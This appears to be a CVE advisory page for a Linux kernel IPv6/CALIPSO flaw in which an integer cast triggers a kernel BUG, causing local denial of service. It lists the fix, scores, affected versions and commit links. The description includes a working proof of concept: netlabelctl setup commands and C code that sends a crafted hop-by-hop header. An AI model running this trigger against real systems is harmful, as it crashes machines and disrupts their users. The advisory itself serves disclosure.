CVE-2025-71085
Vulnerability Summary
Timeline
Description
In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0);
CVSS Metrics
- v3.1•MEDIUM•Score: 5.5CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
EPSS Trends
Current EPSS score: 0.03%• Percentile: 10%
Techniques & Countermeasures
- CWE-617•Reachable Assertion
The product contains an assert() or similar statement that can be triggered by an attacker, which leads to an application exit or other behavior that is more severe than necessary.
Affected Systems
- linux•linux
≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < 86f365897068d09418488165a68b23cb5baa37f2 | ≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < 6b7522424529556c9cbc15e15e7bd4eeae310910 | ≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < 2bb759062efa188ea5d07242a43e5aa5464bbae1 | ≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < c53aa6a5086f03f19564096ee084a202a8c738c0 | ≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < bf3709738d8a8cc6fa275773170c5c29511a0b24 | ≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < 73744ad5696dce0e0f43872aba8de6a83d6ad570 | ≥ 2917f57b6bc15cc6787496ee5f2fdf17f0e9b7d3, < 58fc7342b529803d3c221101102fe913df7adb83 | 4.8
- linux•linux_kernel
≥ 4.8.1, < 5.10.248 | ≥ 5.11, < 5.15.198 | ≥ 5.16, < 6.1.160 | ≥ 6.2, < 6.6.120 | ≥ 6.7, < 6.12.64 | ≥ 6.13, < 6.18.4 | 4.8 | 6.19:rc1 | 6.19:rc2 | 6.19:rc3 | 6.19:rc4 | 6.19:rc5 | 6.19:rc6 | 6.19:rc7 | 6.19:rc8
References (7)
- https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2
- https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910
- https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1
- https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0
- https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24
- https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570
- https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83